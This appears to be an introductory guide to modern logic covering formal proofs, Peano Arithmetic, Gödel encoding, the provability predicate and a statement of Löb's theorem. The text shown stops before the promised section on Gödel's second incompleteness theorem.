¹ Omit authentication unless relevant. We could define a multi-users RSA encryption problem, but it has less practical relevance. And when a legitimate user's ability to decipher random challenges is used to authenticate, that multi-users RSA encryption problem becomes equivalent to our multi-users authentication RSA problem: the restriction $$y\in[0,2^{k-1})$$ is minor, and using the multiplicative property of RSA can be shown irrelevant, I guess.
² This reference's $$nlen$$ is our $$k$$. We use the notation in the landmark proof of PPS by Bellare and Rogaway (1996), and improved proof of FDH by Coron (2000).
³ One of these precautions is that $$p-1$$ has a large prime factor. This is to guard against Pollard's $$p-1$$ factoring algorithm. This algorithm is a non-issue in the RSA problem, since factoring algorithms with a much better asymptotic cost are known. That's less evident in the multi-users RSA problem: this algorithm's probability of success grows markedly with $$u$$ at constant cost, when the parameters $$B_1$$ and $$B_2$$ of Pollard's $$p-1$$ are tuned so that all the $$N_i$$ can be tested. For $$k$$ in the low hundreds and $$u$$ in the millions, it seems this strategy beats ECM with random curves (which giveq the adversary an advantage independent of $$u$$ AFAIK).
• This problem was studied for DLP and (gap) CDH in a recent Eurocrypt paper. Not sure about the RSA problem. – Occams_Trimmer Jun 3 '20 at 4:05
• How is swapping 1 and 2 making it easier for the attacker? I think it will make it harder, as you have to commit to a user before getting the challenge. – Paŭlo Ebermann Jun 15 '20 at 21:35
• @PaŭloEbermann : swapping 1 and 2 does not make things easier for the attacker, thanks for noticing. It makes the attacker's task harder (e.g. an hypothetical technique to solve the RSA problem when $y\equiv n\bmod e)$ gives a smaller advantage). I repaired the question. – fgrieu Jun 18 '20 at 18:43
|
2021-01-16 08:17:38
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 33, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8692907691001892, "perplexity": 1194.3684457961783}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703505861.1/warc/CC-MAIN-20210116074510-20210116104510-00755.warc.gz"}
|
http://rsusu1.rnd.runnet.ru/libraries/ARPACK/node66.html
|
Next: LAPACK routines used by Up: ARPACK subroutines Previous: XYapps
## XYeupd
The purpose of XYeupd is to obtain the requested eigenvalues and eigenvectors (or Schur basis vectors) for the original problem from the information computed by XYaupd for the linear operator .Regardless of whether a spectral transformation is used, the eigenvectors will remain unchanged on transforming back to the original problem. If a spectral transformation is used, then subroutine XYaupd will compute eigenvalues of Subroutine XYeupd maps them to those of except in two cases. The exceptions occur when using [s,d]naupd with a complex shift with either of or Note that if is a real shift, [s,d]neupd can recover the eigenvalues since then Otherwise, the eigenvalues must be recovered by the user, preferably by using the converged Ritz vectors and computing Rayleigh quotients with them for the original problem. We hope to automate this step in a future release.
If eigenvectors are desired, an orthonormal basis for the invariant subspace corresponding to the converged Ritz values is first computed. The vectors of this orthonormal basis are called approximate Schur vectors for Figure 5.2 outlines our strategy. Refer to Figure 5.2 for definitions of the quantities discussed in the remainder of this section.
Compute the partial Schur form where the converged, wanted Ritz values computed by XYaupd are located on the diagonal of the upper triangular matrix of order Compute the approximate Schur vectors of by forming and placing in the first columns of Denote the matrix consisting of these first columns by If eigenvectors are desired, then Compute the eigendecomposition Compute the Ritz vectors by forming
For symmetric eigenvalue problems [s,d]seupd does not need Step 3 of Figure 5.2 since Schur vectors are also eigenvectors. Moreover, a special routine is not required to re-order the Schur form since is a diagonal matrix of real eigenvalues.
For real non-symmetric eigenvalue problems, [s,d]neupd uses the real Schur form. That is, is an upper quasi-triangular matrix with 1-by-1 and 2-by-2 diagonal blocks; each 2-by-2 diagonal block has its diagonal elements equal and its off-diagonal elements of opposite sign. Associated with each 2-by-2 diagonal block is a complex conjugate pair of eigenvalues. The real eigenvalues are stored on the diagonal of Similarly, is a block diagonal matrix. When the eigenvalue is complex, the complex eigenvector associated with the eigenvalue with positive imaginary part is stored in two consecutive columns of The first column holds the real part of the eigenvector and the second column holds the imaginary part. The eigenvector associated with the eigenvalue with negative imaginary part is simply the complex conjugate of the eigenvector associated with the positive imaginary part. The computed Ritz vectors are stored in the same manner.
The computation of the partial Schur form needed at Step 1 is performed by first calling the appropriate LAPACK subroutine that computes the full Schur decomposition of Another LAPACK subroutine, Xtrsen , re-orders the computed Schur form to obtain and The approximate Schur vectors are formed by computing the QR factorization of and then postmultiplying with the factored form. This avoids the need for the additional storage that would be necessary if were computed directly. The appropriate LAPACK subroutines are used to compute and apply the QR factorization of The factored approach described above is extremely stable and efficient since is a numerically orthogonal matrix.
In exact arithmetic, there would be no need to perform the reordering (or the sorting for the symmetric eigenvalue problem). In theory, the implicit restarting mechanism would obviate the need for this. However, computing in finite precision arithmetic (as usual) complicates the issue and make these final reorderings mandatory. See Chapter 5 in [22] and [26] for further information.
When Ritz vectors are required, the LAPACK subroutine Xtrevc is called to compute the decomposition Since is an upper quasi triangular matrix, the product is easily formed using the level 3 BLAS subroutine Xtrmm .
The computed eigenvectors (Ritz vectors) returned by XYeupd are normalized to have unit length with respect to the semi-inner product that was used. Thus, if they will have unit length in the standard 2-norm. In general, a computed eigenvector will satisfy with respect to the matrix that was specified.
Next: LAPACK routines used by Up: ARPACK subroutines Previous: XYapps
Chao Yang
11/7/1997
|
2018-06-25 00:05:31
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.892113983631134, "perplexity": 638.557360828608}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-26/segments/1529267867304.92/warc/CC-MAIN-20180624234721-20180625014721-00160.warc.gz"}
|
https://nips.cc/Conferences/2021/ScheduleMultitrack?event=27598
|
`
Timezone: »
Poster
Lue Tao · Lei Feng · Jinfeng Yi · Sheng-Jun Huang · Songcan Chen
Tue Dec 07 04:30 PM -- 06:00 PM (PST) @ Virtual #None
Delusive attacks aim to substantially deteriorate the test accuracy of the learning model by slightly perturbing the features of correctly labeled training examples. By formalizing this malicious attack as finding the worst-case training data within a specific $\infty$-Wasserstein ball, we show that minimizing adversarial risk on the perturbed data is equivalent to optimizing an upper bound of natural risk on the original data. This implies that adversarial training can serve as a principled defense against delusive attacks. Thus, the test accuracy decreased by delusive attacks can be largely recovered by adversarial training. To further understand the internal mechanism of the defense, we disclose that adversarial training can resist the delusive perturbations by preventing the learner from overly relying on non-robust features in a natural setting. Finally, we complement our theoretical findings with a set of experiments on popular benchmark datasets, which show that the defense withstands six different practical attacks. Both theoretical and empirical results vote for adversarial training when confronted with delusive adversaries.
|
2022-05-28 00:37:04
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4783456325531006, "perplexity": 2147.753443859107}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652663011588.83/warc/CC-MAIN-20220528000300-20220528030300-00289.warc.gz"}
|
https://realjenius.com/tags/jvm/
|
## Values, Records, and Primitives (Oh My!) - Kotlin & Java's 'Valuable' Future
A couple years ago, I did a semi-deep-dive on Kotlin Inline Classes and how they were implemented. Kotlin 1.5 was just released, and with it came the evolution of inline classes into the start of value classes. Meanwhile, Kotlin 1.5 also now supports JVM Records, which at first read might sound like a very similar concept. Finally, with JEP-401 Java is going to bring “primitive classes” which also sounds like a very similar concept. This can sound all very confusing, so let’s take a look!
Kotlin has an annotation called @JvmDefault which, like most of the “Jvm” prefixed annotations, exists to help massage the Kotlin compiler output to match Java classes in a certain way. This annotation was added in 1.2.40, and has now seen some experimental enhancements in 1.2.50, so it seems worth exploring what this is all about.
|
2022-11-26 16:14:00
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.248718723654747, "perplexity": 3866.3367307974927}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446708010.98/warc/CC-MAIN-20221126144448-20221126174448-00234.warc.gz"}
|
https://byjus.com/de-moivres-theorem-calculator/
|
De Moivres Theorem Calculator
De Moivre's Theorem Formula:
(cosx+isinx)n=cosnx+isinnx
Enter the value of n=
Enter the value of x =
Equation is=
Equation at x is=
The De Moivre's Theorem Calculator an online tool which shows De Moivre's Theorem for the given input. Byju's De Moivre's Theorem Calculator is a tool
which makes calculations very simple and interesting. If an input is given then it can easily show the result for the given number.
Practise This Question
In throwing a pair of dice, find the probability of getting a total of 8.
|
2019-06-16 22:56:30
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9405272006988525, "perplexity": 950.3323215010306}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627998325.55/warc/CC-MAIN-20190616222856-20190617004856-00495.warc.gz"}
|
https://calculator.academy/conductance-calculator/
|
Enter the total cross-sectional area, resistivity of the component, and length into the calculator to determine the conductance.
Conductance Formula
The following formula is used to calculate the conductance of an electronic component.
C = A / (p * L)
• Where C is the conductance (siemens)
• A is the area (m^2)
• p is the resistivity
• L is the length (m)
Conductance Definition
Conductance is defined as the ability of a material or system to transmit the flow of electrons through itself.
Conductance Example
How to calculate conductance?
1. First, determine the area.
Calculate the total area of the material.
2. Next, determine the resistivity.
Calculate the resistivity of the material.
3. Next, determine the length.
Measure the total length of electron flow.
4. Finally, calculate the conductance.
Calculate the conductance using the formula above.
FAQ
What is conductance?
Conductance is a measure of a material’s ability to allow electrons to flow through it.
What is resistivity?
Resistivity is a measure of the resistance of flow to electrons.
|
2022-01-29 07:49:53
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8252791166305542, "perplexity": 1345.5647124075}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320300573.3/warc/CC-MAIN-20220129062503-20220129092503-00020.warc.gz"}
|
https://tex.stackexchange.com/questions/173345/biblatex-square-brackets-color
|
# Biblatex square brackets color
How can I change the square brackets color of references in text using biblatex (numeric style)?
I know it can be done with natbib, but not using this package anymore.
\documentclass[hidelinks,spanish]{book}
\usepackage[usenames,dvipsnames]{color}
\usepackage[usenames,dvipsnames,svgnames,table]{xcolor}
\definecolor{CeruleanRef}{RGB}{12,127,172}
\usepackage[numbers,sort&compress]{natbib}
\bibpunct{\color{CeruleanRef}[}{\color{CeruleanRef}]}{,}{n}{}{;}
\bibliographystyle{unsrtnat}
\begin{document}
\frontmatter
\mainmatter
A reference: \cite{RBoehler1996}
\appendix
\backmatter
\bibliography{articles,reports,books,reviews}
\end{document}
With natbib I get this:
I want the same with biblatex and biber.
• You mean the square brackets around the entries in the bibliography? Or those in the text? Or both? In answering this question, please provide us with a minimal working example (MWE) that we can use. Helping us really does help you. – Werner Apr 25 '14 at 0:38
• Quickly searching through the natbib documentation, I didn't find "color" there, so I don't know what kind of functionality that is. (Something related and common is to color the reference with hyperref since it's a link, with \usepackage[colorlinks]{hyperref}, but in "[1]" that will color only "1", and not the brackets.) – pst Apr 25 '14 at 5:23
• Do you want the brackets to also be hyperlinked? – moewe Apr 25 '14 at 8:07
• @pst with the \bibpunct command – Mario Apr 25 '14 at 17:25
What you see there is that hyperref colours (cite) links (because you told it so in colorlinks=true, citecolor=CeruleanRef). Normally, when you cite only a certain part of that citation is actually turned into a link, with the numeric style only the number itself, not the brackets are linked. Your natbib fix did not extend the link to the brackets, it just coloured them in.
We can emulate that behaviour by adding \color{CeruleanRef} to the wrapper of the \cite command (I took it from numeric.cbx, if you use numeric-comp.cbx or another style, copy the definition of \cite from there)
\DeclareCiteCommand{\cite}[\color{CeruleanRef}\mkbibbrackets]% <--- this is new
{\usebibmacro{prenote}}
{\usebibmacro{citeindex}%
\usebibmacro{cite}}
{\multicitedelim}
{\usebibmacro{postnote}}
for numeric-comp
\DeclareCiteCommand{\cite}[\color{CeruleanRef}\mkbibbrackets]
{\usebibmacro{cite:init}%
\usebibmacro{prenote}}
{\usebibmacro{citeindex}%
\usebibmacro{cite:comp}}
{}
{\usebibmacro{cite:dump}%
\usebibmacro{postnote}}
Remember: This will not actually create a hyperlink, the text will just look like one. Hyperlinks with ranges that big can only be created in very special cases with a huge amount of work. (With numeric-comp, linking the brackets would not even make sense: Where is the link from the bracket supposed to link to.)
MWE
\documentclass{article}
\usepackage[T1]{fontenc}
\usepackage[backend=biber, style=numeric-comp]{biblatex}
\usepackage[usenames,dvipsnames,svgnames,table]{xcolor}
\definecolor{CeruleanRef}{RGB}{12,127,172}
\DeclareCiteCommand{\cite}[\color{CeruleanRef}\mkbibbrackets]
{\usebibmacro{cite:init}%
\usebibmacro{prenote}}
{\usebibmacro{citeindex}%
\usebibmacro{cite:comp}}
{}
{\usebibmacro{cite:dump}%
\usebibmacro{postnote}}
\begin{document}
\cite{companion,knuth:ct:b,knuth:ct:c} and \cite{baez/article} \cite{aksin}
\printbibliography
\end{document}
One could also use a kludge as suggested in my comment
\makeatletter
\renewcommand*{\bibleftbracket}{\blx@postpunct\textcolor{red}{[}}
\renewcommand*{\bibrightbracket}{\blx@postpunct\textcolor{red}{]}\midsentence}
\makeatother
This does have side-effects though: All opening brackets will be coloured red.
• the idea of having colored brackets is not just for linking, but for reading a printed document (aesthetic reasons). – Mario Apr 29 '14 at 14:09
|
2019-07-23 18:36:56
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7908294200897217, "perplexity": 2000.9660349465987}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195529481.73/warc/CC-MAIN-20190723172209-20190723194209-00009.warc.gz"}
|
https://arbital.greaterwrong.com/p/intro_modern_logic?l=661
|
# An introductory guide to modern logic
Welcome! We are about to start a journey through modern logic, in which we will visit two central results of this branch of mathematics, which are often misunderstood and sometimes even misquoted: Löb’s theorem and Gödel’s second incompleteness theorem.
Modern logic can be said to have been born in the ideas of Gödel regarding the amazing property of self-reference that plagues arithmetic. Badly explained, this means that we can force an interpretation over natural numbers which relates how deductions are made in arithmetic to statements about arithmetical concepts such as divisibility.
This guide is targets people who are already comfortable with mathematical thinking and mathematical notation. It requires however no specific background knowledge about logic or math to be read. The guide starts lightweight and gets progressively more technical.
# Formal proofs
What is logic anyway? A short explanation refers to the fact that we humans happen to be able to draw conclusions about things we have not experienced by using facts about how the world is. For example, if you see somebody entering the room and is dripping water, then you infer that it is raining outside, even though you have not seen the rain yourself.
This may seem trivial, but what if we are trying to program that into a computer? How can we capture this intuition of what reasoning is and write down the rules for proper reasoning in a way precise enough to be turned into a program?
To accomplish that is to do logic. The ultimate goal is to have an efficient procedure that if followed will allow to deduce every true consequence of a set of premises, so simple that it could be taught to a dumb machine which only follows mechanical operations.
So let’s try to formalize reasoning!
We are going to draw inspiration from mathematicians and see what they are doing when proving a result.
Though the method is often convoluted, non linear and hard to understand, in essence what they are doing is writing down some hypothesis and facts that they assume to be true. Then they apply some manipulation rules which they assume that when applied on true premises allow to derive true facts. After iterating this process, they arrive to the wanted result.
## Getting formal
Well, let’s wrap together this intuitive process in a formal definition.
A proof of a sentence $$\phi$$ is a sequence of well formed sentences such that every sentence in the sequence is either an axiom or can be derived of the previous sentences using a derivation rule, and the final sentence in the sequence is $$\phi$$. A sentence which has a proof is called a theorem.
Don’t be scared by all the new terms! Let’s go briefly over them.
A well formed sentence is just a combination of letters which satisfies a certain criteria which makes them easy to interpret. The sentences we will be dealing with are logical formulas, which use a particular set of symbols such as $$=, \wedge, \implies$$. Our goal is to assign truth values to sentences. That is, to say if particular sentences are true or false.
An axiom is something that we assume to be true without requiring a proof. For example, a common axiom in arithmetic is assuming that $$0$$ is different than $$n+1$$ for all natural numbers $$n$$. Or expressed as a well formed sentence, $$\forall n. 0 \not = n+1$$. noteThe symbol $$\forall$$ is an upside-down A and means “for all”.
A derivation rule is a valid basic step in a proof. Perhaps the simplest example is modus ponens . Modus ponens tells you that if you have deduced somehow that $$A\implies B$$ and also $$A$$, then you can deduce from both facts $$B$$.
Those three components constitute the basis of a logical system for reasoning: a criteria for constructing well formed sentences, a set of axioms which we know to be true noteThe set of axioms does not have to be finite! In particular, we can specify a criteria to identify infinitely many axioms. This is called an axiom schema and some derivation rules which allow us to deduce new conclusions.
For a rather silly example, let’s consider the system $$A$$ with the following components:
• Well formed sentences: the set of words in the Webster dictionary.
• Axioms: The word ‘break’.
• Deduction rules: If a word $$w$$ is a theorem of $$A$$, then so it is a word which only differs in one letter of $$w$$, either by adding, substracting or replacing it anywhere in $$w$$.
Thus the word ‘trend’ is a theorem of $$A$$, as shown by the 4 steps long proof ‘break—bread—tread—trend’. The first sentence in the proof is an axiom. Every sentence after is deduced from our deduction rule using the previous sentence as a premise. <div><div>
## Interpretations
Given how we defined a logical system, there is a certain degree of freedom we have, as we can choose the underlying sets of well formed sentences, the axioms and the deduction rules. However, as shown in the example above, if we want to make meaningful deductions we should be careful in what components do we choose for our logical system.
The criteria we use to choose these components is intertwined with the model we are trying to reason about. Models can be anything that captures an aspect of the world, or just a mathematical concept. To put it simply, they are the thing we are trying to reason about.
Depending on what kind of entities the model has, we will lean towards a particular choice of sentences. For example, if our model consists in just facts which are subject to some known logical relations we could use the language of propositional logic. But if our model contains different objects which are related in different ways, we will prefer to use the language of first order logic.
Each model has an interpretation associated, which relates the terms in the sentences to aspects of the model. For all practical purposes, a model and its interpretation are the same once we have fixed the language, and thus we will use the terms as synonyms.
Then, depending on how the model evolves and what things can we infer from what facts we should choose some deduction rules. Together, the sentences and the deduction rules specify a class of possible models. If the deduction rules correctly capture the properties of the class of models we had in mind, in the sense that from true premises we really derive true consequences, then we will say that they are sound.
Intuitively, we say that the choice of language and deduction rules decides the “shape” that our models will have. Every model with such a shape will be part of the universe of models specified by those components of a logical system.
With this imagery of a class of models, we can think of axioms as an attempt to reduce the class of models and pin down the concrete model we are interested in, by choosing as axioms sentences whose interpretation is true in only the model we are interested in and in no other model notesadly, there are occasions in which this is just not possible.
A property tightly related to soundness is completeness. A system is complete if every sentence which is true under all interpretations which satisfy our axioms has a proof.
It is important to realize that logical systems can be talking about many models at once. In particular, if two interpretations satisfy the axioms but disagree on the truth of a particular sentence, then that sentence will be undecidable in our model.
This suggest a technique for proving independence of logical statements. To show that a certain sentence is independent from some axioms, construct two models which satisfy those axioms but contradict each other on the value of the statement. A nice example of this is how Lobachevsky showed that Euclides Fifth postulate is independent from the other four postulates.
## Introducing PA
For our purposes, we will stick to a particular logical system called Peano arithmetic. This particular choice of axioms and deduction rules is interesting because it reflects a lot of our intuitions about how numbers work, which in turn can be used to talk about many phenomena in the real world. In particular, they can talk about themselves.
Before we move on to this “talking about themselves” business I am going to introduce more notation. We will refer to Peano Arithmetic as $$PA$$. If a sentence $$\phi$$ follows from the axioms of $$PA$$ and its deduction rules noteie, there is a proof of $$\phi$$ using only axioms and deduction rules from $$PA$$, we will say that $$PA\vdash \phi$$, read as “$PA$ proves $$\phi$$”.
# Self reference and the provability predicate
Let’s try to get an intuition of what I mean when I say that numbers can talk about themselves.
The first key intuition is that we can refer to arbitrary sequences of characters using numbers. For example, I can declare that from now onwards the number $$1$$ is going to refer to the sequence of letters “I love Peano Arithmetic”. Furthermore, using a clever rule to relate numbers and sentences I can make sure that every possible finite sentence gets assigned a number noteThis is called encoding.
A simple encoding goes by the name of Gödel encoding, and consists of assigning to every symbol we are going to allow to be used in sentences a number. For example, $$=$$ could be $$1$$, and $$a$$ could be $$0$$, and so on and so forth. Then we could encode a sentence consisting of $$n$$ symbols as the number $$2^{a_1}3^{a_2}5^{a_3}\cdots p(n)^{a_n}$$. That is, we take the number which is the product of the $$n$$th first primes with exponents equal to the assigned numbers.noteThis is possible because every number can be decomposed as a unique product of primes.
The process can be repeated to encode sequences of sentences as single numbers. Thus, we can encode whole proofs as single numbers. We could also encode sequences of sequences of sentences, but that is going too far for our purposes.
whole example of Gödel encoding, define carefully notation of godelquotes
So the point is, we can exchange sentences by numbers and vice versa. Can we also talk about deduction using numbers?
It turns out we can! With the encoding we have chosen it is cumbersome to show, but we can write a predicate $$Axiom(x)$$ noteA predicate is a well formed sentence in which we have left one or more “holes” in the form of variables which we can substitute for literal numbers or quantify over. For example, we can have the predicate $$IsEqualTo42(x)$$ of the form $$x = 42$$. Then $$PA\vdash IsEqualTo42(42)$$ and $$PA\vdash \exists x IsEqualTo42(x)$$, but $$PA\not\vdash IsEqualTo42(7)$$ in the language of Peano Arithmetic such that $$PA\vdash Axiom(\textbf{n})$$ if and only if $$n$$ is a number which encodes an axiom of $$PA$$.
Furthermore, deduction rules which require $$n$$ premises can be represented by $$n+1$$ predicates $$Rule(p_1, p_2,..., p_n, r)$$ which is provable in $$PA$$ if and only if $$p_1, ...., p_n$$ are numbers encoding valid premises for the rule and $$r$$ is the corresponding deduced fact.
A bit more of work and we can put together a predicate $$Proof(x,y)$$, which is provable in $$PA$$ if and only if $$x$$ encodes the valid proof of the sentence $$y$$. Isn’t that neat!?
Since we are not too interested in the proof itself, and more in the fact that there is a proof at all, we are going to construct the provability predicate $$\exists x. Proof(x,y)$$, which we will call $$\square_{PA}(y)$$.note$$\exists$$ is a backwards E and means “there exists”. So then, $$\square_{PA}(x)$$ literally means “There is a proof in $$PA$$ of $$x$$”.
Thus we can say that if the number $$\ulcorner 1+1=2 \urcorner$$ corresponds to the sentence $$1+1=2$$noteThis notation remains in effect for the rest of the article., then $$PA\vdash \square_{PA}(\ulcorner 1+1=2 \urcorner)$$. That is, $$PA$$ proves that there is a proof in $$PA$$ of $$1+1=2$$.
Now, the predicates we have seen so far are quite intuitive and nicely behaved, in the sense that their deducibility from $$PA$$ matches quite well what we would expect from our intuition. However, adding the existential quantifier in front of $$Proof(x,y)$$ we get some nasty side effects.
The thing is that $$PA$$ “hallucinates” numbers which it is not sure whether they exist or not. Those are no mere natural numbers, but infinite numbers further in the horizon of math. While $$PA$$ cannot prove their existence, it neither cannot prove its non existence. So $$PA$$ becomes wary of asserting that proofs do not exist for a certain false sentence. After all, one of those non standard numbers may encode the proof of the false sentence! Who is to prove otherwise?
Can we patch this somehow? Maybe by adding more axioms or deduction rules to $$PA$$ so that it can prove that those numbers do not exists? The answer is yes but not really. While it is doable in principle, the resulting theory becomes too difficult to manage, and we can no longer use it for effective deduction noteTechnically, $$PA$$ loses its semidecidability that way..
We will now proceed to prove two technical results which better formalize this idea: Löb’s theorem and Gödel’s Second Incompleteness Theorem.
# Löb’s theorem
Löb’s result follows from the intuitive properties of deduction that the provability predicate actually manages to capture. This points to the fact that it is not our definition what is wrong, but rather to a fundamental impossibility in logic.
The intuitive, good properties of $$\square_{PA}$$ are known as the Hilbert-Bernais derivability conditions, and are as follows:
1. If $$PA\vdash A$$, then $$PA\vdash \square_{PA}(\ulcorner A\urcorner)$$.
2. $$PA\vdash \square_{PA}(\ulcorner A\rightarrow B\urcorner) \rightarrow [\square_{PA}(\ulcorner A \urcorner)\rightarrow \square_{PA}(\ulcorner B \urcorner)]$$
3. $$PA\vdash \square_{PA}(\ulcorner A\urcorner) \rightarrow \square_{PA} \square_{PA} (\ulcorner A\urcorner)$$.
Let’s go over each of them in turn.
1) says reasonably that if $$PA$$ proves a sentence $$A$$, then it also proves that there is a proof of $$A$$.
2) affirms that if you can prove that $$A$$ implies $$B$$ then the existence of a proof of $$A$$ implies the existence of a proof of $$B$$. This is quite intuitive, as we can concatenate a proof of $$A$$ with a proof of $$A\rightarrow B$$ and deduce $$B$$ from an application of modus ponens.
3) is a technical result which states that the formalization of 1) is provable when we are dealing with sentences of the form $$\square_{PA}(\ulcorner A \urcorner)$$.
One more ingredient is needed to derive Löb’s: the diagonal lemma, which states that for all predicates $$\phi(x)$$ there is a formula $$\psi$$ such that $$PA\vdash \psi \leftrightarrow \phi(\ulcorner \psi \urcorner)$$.
The details of the proof can be found in Proof of Löb’s theorem.
The details are not essential to the main idea, but it can be illustrative to work through the formal proof. Plus the intuition behind related to the non-standard numbers we talked about before.
What is really interesting is that now we are in position to enunciate and understand Löb’s theorem!
Löb’s theorem
If $$PA\vdash \square_{PA}(\ulcorner A\urcorner) \rightarrow A$$, then $$PA\vdash A$$.
(or equivalently, if $$PA\not\vdash A$$ then $$PA\not\vdash \square_{PA}(\ulcorner A\urcorner) \rightarrow A$$).
Talk about an unintuitive result! Let’s take a moment to ponder about its meaning.
Intuitively, we should be able to derive from the existence of a proof of $$A$$ that $$A$$ is true. After all, proofs are guarantees that something really follows from the axioms, so if we got those right and our derivation rules are correct then $$A$$ should be true. However, $$PA$$ does not trust that being able to find the existence of a proof is enough to make $$A$$ true!
